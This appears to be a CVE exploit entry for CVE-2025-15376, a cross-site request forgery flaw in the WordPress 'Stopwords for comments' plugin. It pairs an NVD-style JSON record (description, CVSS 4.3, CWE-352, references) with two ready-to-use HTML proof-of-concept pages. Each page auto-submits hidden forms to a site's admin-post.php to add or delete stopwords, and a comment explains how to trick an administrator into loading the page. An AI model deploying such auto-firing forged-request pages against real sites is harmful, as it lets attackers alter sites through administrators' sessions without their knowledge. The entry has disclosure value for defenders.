CVE-2025-15376

<!-- CSRF PoC for CVE-2025-15376 --> <!-- This PoC demonstrates adding a stopword --> <html> <body> <form action="http://target-site.com/wp-admin/admin-post.php" method="POST"> <input type="hidden" name="action" value="set_stopwords_for_comments" /> <input type="hidden" name="stopwords" value="malicious_word" /> <input type="hidden" name="nonce" value="" /> <input type="submit" value="Submit" /> </form> <script> document.forms[0].submit(); </script> </body> </html> <!-- CSRF PoC for deleting stopwords --> <html> <body> <form action="http://target-site.com/wp-admin/admin-post.php" method="POST"> <input type="hidden" name="action" value="delete_stopwords_for_comments" /> <input type="hidden" name="stopwords" value="allowed_word" /> <input type="submit" value="Submit" /> </form> <script> document.forms[0].submit(); </script> </body> </html> <!-- Attack flow: 1. Attacker creates malicious page with CSRF PoC 2. Tricks administrator into visiting the page 3. Browser automatically sends request with admin cookies 4. Server processes request without verifying nonce 5. Stopwords are modified as attacker intended -->

{"cve": {"id": "CVE-2025-15376", "sourceIdentifier": "[email protected]", "published": "2026-01-14T07:16:13.883", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Stopwords for comments plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing nonce validation on the 'set_stopwords_for_comments' and 'delete_stopwords_for_comments' functions. This makes it possible for unauthenticated attackers to add or delete stopwords via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Stopwords for comments para WordPress es vulnerable a falsificación de petición en sitios cruzados en todas las versiones hasta la 1.1, inclusive. Esto se debe a la falta de validación de nonce en las funciones 'set_stopwords_for_comments' y 'delete_stopwords_for_comments'. Esto hace posible que atacantes no autenticados añadan o eliminen stopwords a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/stopwords-for-comments/trunk/functions.php?marks=151,170#L151", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dd8c45c7-dbb2-46ab-8e50-e02062587b00?source=cve", "source": "[email protected]"}]}}